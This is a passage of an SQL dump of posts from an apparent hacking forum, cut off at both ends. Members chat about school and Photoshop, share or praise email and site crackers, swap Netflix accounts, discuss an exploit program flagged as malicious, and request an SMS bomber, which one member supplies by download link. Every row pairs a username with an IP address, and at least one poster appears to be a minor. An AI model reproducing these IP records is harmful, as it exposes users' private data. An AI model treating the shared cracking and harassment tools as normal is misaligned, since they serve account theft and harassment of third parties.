helps speed up tasks -- resulting in less latency when launching and running programs -- plus it helps with multitasking, too. But you\'ll need to know what kind of system memory your machine takes (probably DDR3) and whether you\'re buying for a laptop or desktop (laptop RAM is smaller). RAM can often be snapped into its slot on the motherboard without requiring any tools; if you don\'t want to do it yourself, take it to your local electronics retailer and have them do it for you. [b]Mice, keyboards and webcams[/b] If your mouse is still tethered to your computer, it\'s time to cut the cord with a wireless mouse — which you can pick up for as low as $5 these days (yes, for real). But because they\'re battery powered, consider picking up rechargeable batteries as it\'ll be easier on your wallet (over time) and the environment, too. [b]Speakers, monitors and USB hubs[/b] Whether you\'re into music, video games or movies, treat yourself — more specifically, your ears — to a great-sounding computer speaker set-up. Add some boom to your room with the Logitech Z523 ($99.99), a 2.1-channel speaker system (including a 6.5-inch subwoofer) that delivers 40 watts of total power. While you can use your computer to adjust volume, convenient on-speaker controls include power, volume and amount of bass, plus there\'s extra jacks for a portable devices and headphones.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '902f0315c35d7c3fbabca935a0745edf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1776', '373', '1734', '16', 'RE: Cadburys (SE)', '0', '5', 'Timmy', '1347328971', 'Thanks man I love cadbury chocolates', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '8f27c3d765bbb623907cff6368ea8f0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1777', '326', '1641', '16', 'RE: [TUT] Free Restaurant Gift Cards.', '0', '5', 'Timmy', '1347329034', '[quote=\'??????Z\' pid=\'1641\' dateline=\'1346964231\'] attempted McDonald\'s and Nandos. will update if it works out :) [/quote] America has Nandos? Also what restaurants can it work with?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'a7238d18920522faa81e264bb4a7b46a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1778', '350', '1649', '18', 'RE: WESTi\'s Email Cracker (Crack Any E-Mail - Hotmail, Yahoo, Gmail)', '0', '5', 'Timmy', '1347329098', 'This is awesome. Thanks by the way multi upload has removed their site.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '6d63ad8f182c311a7a06ce2866722afe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1780', '298', '1383', '9', 'RE: ???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '7', 'Romdu62', '1347329518', 'I would like this when the user comes online.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '629158203463af32cd6c6e6b5877496f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1781', '388', '0', '52', 'Request for the coders group', '0', '7', 'Romdu62', '1347329794', 'Can someone from the coders group please make me a SMS Bomber from the thread below? http://l33thacking.net/thread-216.html Thanks a lot', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'be3395f5b69554c3b806e1845d9270f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1782', '353', '1654', '13', 'RE: [Complete Guide]*How to crack All Sites Hosting With Apex!*[Complete Guide]', '0', '7', 'Romdu62', '1347329860', 'Fucking awesome. This tutorial is OD.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '796c433b871d8eb7d5d6493f172a0b2a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1783', '385', '1769', '19', 'RE: Discussion', '0', '82', 'iTzIpod', '1347332520', '[quote=\'p420\' pid=\'1769\' dateline=\'1347313251\'] Don\'t, why do you want to leave LH? You have respect, you have the most awards, you run a official group(free), you are a Mod. You would not just lose all this but LH would lose a lot of activity as well. [/quote] You\'re right about everything. But as for now, there are currently no more awards due to an outdated plugin. And I just have that feeling that I want to leave and I don\'t want to leave. Kinda hard to explain. And the reason why was because.. It\'s nothing. Just something personal me and t3h jok3r about.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b4db3e50af366a830fc6f5311979e761', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1784', '385', '1768', '19', 'RE: Discussion', '0', '2', 'Apathy', '1347332584', 'Why would you Leave?', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', 'b6153b3d8e99954c2bb617cb4a5dc582', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1785', '377', '1739', '54', 'RE: Netflix accounts', '0', '82', 'iTzIpod', '1347332586', 'I don\'t know what the difference between normal and premium. But thanks. Although I don\'t need them since I have my own accounts. Thanks for the contribution to the forum.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '14c3f9b9f8668dde8104590149c4ade5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1786', '361', '1702', '54', 'RE: Xbox live Code (1 Month)', '0', '82', 'iTzIpod', '1347332631', 'Very nice contribution. I don\'t know if it works or not. Since I do not have a Xbox 360.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '358334b6f10c006d1ee952a39c69cf2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1787', '378', '1742', '7', 'RE: How is school for you?', '0', '2', 'Apathy', '1347332652', 'Good but I hate homework.', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '1e65b52ea5e2b3519ce47cd9ef6b5f0d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1788', '348', '1647', '30', 'RE: Brazzers Cracker', '0', '2', 'Apathy', '1347332768', 'I know where you got this. Nice share anyway.', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '8ed22f9c6356abb037395611f095347d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1789', '385', '1784', '19', 'RE: Discussion', '0', '82', 'iTzIpod', '1347332933', '[quote=\'Apathy\' pid=\'1784\' dateline=\'1347332584\'] Why would you Leave? [/quote] [quote=\'iTzIpod\' pid=\'1783\' dateline=\'1347332520\'] You\'re right about everything. But as for now, there are currently no more awards due to an outdated plugin. And I just have that feeling that I want to leave and I don\'t want to leave. Kinda hard to explain. [b]And the reason why was because.. It\'s nothing. Just something personal me and t3h jok3r about.[/b] [/quote]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9e0f59cbcdbefa2ac3de261763228274', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1790', '383', '1765', '29', 'RE: Paypal Withdrawy to cash or debit card [TUT DL]', '0', '82', 'iTzIpod', '1347333308', '[quote=\'??????Z\' pid=\'1765\' dateline=\'1347258711\'] okay so with these methods you can withdraw your paypal cash either to cash or debit card, the cash one is very useful if you don\'t want to give any of your personal information to paypal. These tutorials was given to my by a friend so credit doesn\'t belong to me, but if this helped you then [b]please +Rep me.[/b] thanks Withdraw to debit card: http://www.mediafire.com/?z44xmusno4zj12h Withdraw to cash: http://www.mediafire.com/?c8i97f2oa8jbx4b [/quote] I don\'t think you should beg for rep. Or anything similar like that. It just seems LQ and all. Also, I have added you to Unique. OT: I would try this method.. Just that I don\'t got a debit card. Also, thanks for the contribution to LH. Hopefully someone will find it useful! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '189af827dbf19b33a3275760a8810bea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1791', '383', '1765', '29', 'RE: Paypal Withdrawy to cash or debit card [TUT DL]', '0', '112', '??????Z', '1347352489', 'whos begging for rep? and where is the rule that a post has to be HQ to get rep, i say if i help someone then give me rep. surely if this helps someone then i deserve rep. no?', '92.22.255.215', '1545011159', '0', '0', '0', '0', '1', '941d571d3bd874a156edf795544a6d43', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1792', '388', '1781', '52', 'RE: Request for the coders group', '0', '67', 'HoverCatz', '1347359056', 'I can do that :) EDIT: HEy im done. Test it for me, i cant send emails via a 3rd-party from my school. http://www.sendspace.com/file/egkyl7', '193.161.89.203', '-1046390325', '1', '0', '67', '1347362315', '1', 'c63e1f81121c7ad24074f17f3ccc0cc1', '0', '1347362315'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1793', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '183', 'toxicsn0w', '1347362726', 'Why does chrome mark this as Malicious?', '69.119.94.188', '1165450940', '0', '0', '0', '0', '1', '09bf14b308cda3e4145bd0cb097b4bd6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1794', '389', '0', '49', '[Suggestion] GFX Request Section', '0', '82', 'iTzIpod', '1347362908', 'Hey t3h jok3r, I just suggest that you should add a GFX Request Section. In this section, you can request GFX. GFX like Signatures/Tags Avatars Wallpapers Etc.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e0425c47af737ced63f958f9ff6a87ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1795', '383', '1791', '29', 'RE: Paypal Withdrawy to cash or debit card [TUT DL]', '0', '82', 'iTzIpod', '1347363411', '[quote=\'??????Z\' pid=\'1791\' dateline=\'1347352489\'] whos begging for rep? and where is the rule that a post has to be HQ to get rep, i say if i help someone then give me rep. surely if this helps someone then i deserve rep. no? [/quote] Well it was just a suggestion. ;/ Some people will rep you. Some people will post a thank you. It\'s like forcing someone to rep you. They will rep you if they want too.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '45ff13219a3106ac2a9aec2114986663', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1796', '390', '0', '35', 'Which Photoshop version do you use?', '0', '82', 'iTzIpod', '1347365768', 'Just a simple question. I use Photoshop CS4 and Photoshop CS6. How about you?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '453020ea2494bf15964dc08f7634bd50', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1797', '385', '1768', '19', 'RE: Discussion', '0', '67', 'HoverCatz', '1347367004', 'I dont want you to leave, so please dont :(', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'aacbdc435cfb70e37574e9c10db82687', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1799', '389', '1794', '49', 'RE: [Suggestion] GFX Request Section', '0', '61', 'NXK', '1347375550', 'Seems like a Good Idea. I approve of this.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '5940180ef95f193b5fbffa03abeb42ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1800', '368', '1714', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '61', 'NXK', '1347375623', 'Id like one, make me look alittle more legit. I have more than 3 threads that are HQ.', '38.104.158.106', '644390506', '1', '0', '61', '1347375650', '1', '41b0cf38ef17152d20fd9b42d64a6b35', '0', '1347375650'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1801', '390', '1796', '35', 'RE: Which Photoshop version do you use?', '0', '61', 'NXK', '1347375721', 'I use CS6. I\'m learning still but it works good. I used to use cs5 I don\'t really notice a difference in any of them TBH accept visual changes.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '628f21396b7507e6dc688a20839a1be3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1802', '378', '1742', '7', 'RE: How is school for you?', '0', '53', 'sirchamp', '1347376465', 'Lol You have only one teacher?? I have for every subject a different teacher. Im going to a place called the gymnasium. A gymnasium is a school for the like 20% most clever kids of Switzerland. Yeahhh Switzerland.. You have to do a pretty hard test to join my school. So I go to school with lots of brainy kids -.-', '188.155.56.90', '-1130678182', '1', '0', '53', '1347376522', '1', '9bb912419314eab5ae8a90c7f698efac', '0', '1347376522'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1803', '363', '1706', '8', 'RE: Top 10 songs of September 2012', '0', '61', 'NXK', '1347377917', '[video=youtube]http://www.youtube.com/watch?v=uQZMaG1eO74[/video] Will be up there soon.', '99.253.65.17', '1677541649', '1', '0', '61', '1347377955', '1', '68c4745303a932431709e7c7a9483e30', '0', '1347377955'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1804', '289', '1793', '15', 'RE: UploadNSell Exploit Program', '0', '67', 'HoverCatz', '1347384655', '[quote=\'toxicsn0w\' pid=\'1793\' dateline=\'1347362726\'] Why does chrome mark this as Malicious? [/quote] I dont know. it does with all programs i make.', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '1d847d8e6d50d9a747fa66553126bbd0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1805', '389', '1794', '49', 'RE: [Suggestion] GFX Request Section', '0', '62', 'R?????zo?', '1347384850', 'seems a good idea, and I will be happy to make some signatures for members :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'db302b4f93114829e5ce900b25bb4162', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1806', '361', '1702', '54', 'RE: Xbox live Code (1 Month)', '0', '61', 'NXK', '1347390016', 'This code has already been used. Thought I might have gotten lucky aha. Thanks anyways.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'bd8861f134b55b3c0ae4f881c2c02a7f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1807', '368', '1714', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '82', 'iTzIpod', '1347392358', 'Wait does it have to be in the time duration of the contest. Or can it be threads from before?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5d666a34c4d3c13eed91a3eef3e9eac8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1808', '361', '1806', '54', 'RE: Xbox live Code (1 Month)', '0', '82', 'iTzIpod', '1347392449', '[quote=\'NXK\' pid=\'1806\' dateline=\'1347390016\'] This code has already been used. Thought I might have gotten lucky aha. Thanks anyways. [/quote] Can you close the thread?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f99db4afc3502f101070d5797841fcb8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1809', '378', '1802', '7', 'RE: How is school for you?', '0', '82', 'iTzIpod', '1347392591', '[quote=\'sirchamp\' pid=\'1802\' dateline=\'1347376465\'] Lol You have only one teacher?? I have for every subject a different teacher. Im going to a place called the gymnasium. A gymnasium is a school for the like 20% most clever kids of Switzerland. Yeahhh Switzerland.. You have to do a pretty hard test to join my school. So I go to school with lots of brainy kids -.- [/quote] I still go to elementary school. Grade 8.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '946cacee9b0374cc6c25f25a5a9cec2d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1810', '390', '1796', '35', 'RE: Which Photoshop version do you use?', '0', '2', 'Apathy', '1347394378', 'CS6 I went From 4 to 5 to 6 :)', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', 'c7f156c3fecfd7b3876e217e357c6d45', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1811', '378', '1809', '7', 'RE: How is school for you?', '0', '2', 'Apathy', '1347394496', '[quote=\'iTzIpod\' pid=\'1809\' dateline=\'1347392591\'] [quote=\'sirchamp\' pid=\'1802\' dateline=\'1347376465\'] Lol You have only one teacher?? I have for every subject a different teacher. Im going to a place called the gymnasium. A gymnasium is a school for the like 20% most clever kids of Switzerland. Yeahhh Switzerland You have to do a pretty hard test to join my school. So I go to school with lots of brainy kids I still go to elementary school. Grade 8. [/quote] WHAT? lol really?', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '96997d32e28400f002edc3b5d6ad30b1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1812', '378', '1811', '7', 'RE: How is school for you?', '0', '61', 'NXK', '1347397614', 'Hes our little hacker bro :)', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'da6bb2f7d870f5461c7386c30daee28c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1813', '378', '1811', '7', 'RE: How is school for you?', '0', '82', 'iTzIpod', '1347402816', '[quote=\'Apathy\' pid=\'1811\' dateline=\'1347394496\'] [quote=\'iTzIpod\' pid=\'1809\' dateline=\'1347392591\'] [quote=\'sirchamp\' pid=\'1802\' dateline=\'1347376465\'] Lol You have only one teacher?? I have for every subject a different teacher. Im going to a place called the gymnasium. A gymnasium is a school for the like 20% most clever kids of Switzerland. Yeahhh Switzerland You have to do a pretty hard test to join my school. So I go to school with lots of brainy kids I still go to elementary school. Grade 8. [/quote] WHAT? lol really? [/quote] There a problem? Lol @NXK <3 Made my day!~ OT: Glad to see members posting. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3a5b1b003ed29c403c6dd273b83d47b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1814', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '61', 'NXK', '1347411483', 'All this grabs is the same 1month.txt with the same code. It was a good Idea but it needs work.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '9f8ea54bc0655f4a14f2adad039e1bf3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1815', '391', '0', '3', 'Demoted', '0', '20', 'JakeUS', '1347411541', 'I was a former Site Moderator here on L33tHacking. Due to school I was forced to take time away from the internet. I am still a regular Moderator, I am obviously online everyday moderating. Just letting everybody know. :cool:', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'c06448f2aa5908a29a29f86e0dde87c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1816', '392', '0', '9', 'PPD Niches', '0', '61', 'NXK', '1347411949', 'I\'m looking for a good Niche. Mine recently is failing me. Used to make 5-10$ A day. Now I make non :( If anyone has a decent one they\'d like to share Please PM me.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '88539f571322e339ccc67a9054b44146', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1817', '388', '1781', '52', 'RE: Request for the coders group', '0', '7', 'Romdu62', '1347412498', 'Doesn\'t work :( Can you make me a SMS Bomber that works?', '173.245.64.29', '-1376436195', '0', '0', '0', '0', '1', 'b917d3129176bd7dc20f3a260307af37', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1818', '391', '1815', '3', 'RE: Demoted', '0', '7', 'Romdu62', '1347412554', 'Your title sounds wrong lol. I mean I thought you got demoted and you are complaining. Thanks for letting us know.', '173.245.64.29', '-1376436195', '0', '0', '0', '0', '1', 'e245b8b989be18a0da7b52660f45a670', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1819', '390', '1810', '35', 'RE: Which Photoshop version do you use?', '0', '82', 'iTzIpod', '1347413261', '[quote=\'Apathy\' pid=\'1810\' dateline=\'1347394378\'] CS6 I went From 4 to 5 to 6 :) [/quote] Oh. I have never tried CS5. Only CS3, CS4, and CS6. Never liked CS3 :3 I still got it on my computer though.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '97d2d3b1f49f079fc11e9417abca8b74', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1820', '391', '1815', '3', 'RE: Demoted', '0', '61', 'NXK', '1347413370', 'I\'m glad that I have taken over your position. I think Ill do a good job. But At the same time I feel kinda bad :( I hope I can do my job as well as you did. Thanks for the chance.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '40c45973c0fe92528c4c5d93816ee8f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1821', '391', '1815', '3', 'RE: Demoted', '0', '82', 'iTzIpod', '1347413498', 'Title should be JakeUS Demotion Explained Or something. OT: Oh. So that\'s why you were demoted. Yeah I might be inactive and get demoted upon request because of the same reason. If you checked out Unique\'s HQ, you would notice my thread \"Discussion\".. I\'m still thinking about it. Because it\'s a hard decision.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd0bb54e5f70ab5c47a378be7cd4ff895', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, 